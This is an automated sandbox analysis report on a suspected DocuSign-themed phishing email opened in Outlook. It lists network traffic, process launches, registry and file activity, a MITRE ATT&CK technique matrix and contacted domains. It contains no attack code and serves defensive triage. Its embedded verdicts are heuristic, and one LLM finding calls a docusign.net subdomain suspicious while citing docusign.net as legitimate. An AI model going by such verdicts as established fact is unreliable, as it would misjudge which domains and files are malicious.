Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49826 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.winEML@20/228@50/13

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241029T1344530496-6316.etl

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\FW Complete with Docusign Remittance Advice .pdf.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "28C84706-2309-4AB0-A66E-7AC5589B0CDB" "08CC6BE9-FD18-463A-AD81-0A07368353E9" "6316" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=abba683f-186c-4f9e-8ab2-ac0f68fbe569&er=ad16d7d0-2faa-44b9-8c84-a75ce167beb2
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1976,i,9062327613063570313,3700824019867659727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "28C84706-2309-4AB0-A66E-7AC5589B0CDB" "08CC6BE9-FD18-463A-AD81-0A07368353E9" "6316" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=abba683f-186c-4f9e-8ab2-ac0f68fbe569&er=ad16d7d0-2faa-44b9-8c84-a75ce167beb2	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1976,i,9062327613063570313,3700824019867659727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: c2r64.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32

Jump to behavior

Source: Google Drive.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Persistence and Installation Behavior

AI detected potential phishing Email

Source: Email

LLM: Detected potential phishing email: The sender domain 'eumail.docusign.net' is suspicious as legitimate DocuSign typically uses docusign.com or docusign.net

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

File Volume queried: C:\Windows\SysWOW64 FullSizeInformation

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Process Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://aka.ms/LearnAboutSenderIdentification	0%	URL Reputation	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css	0%	URL Reputation	safe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdn.optimizely.com	104.18.65.57	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
cosiosos.com.de	104.21.28.165	true	false	unknown
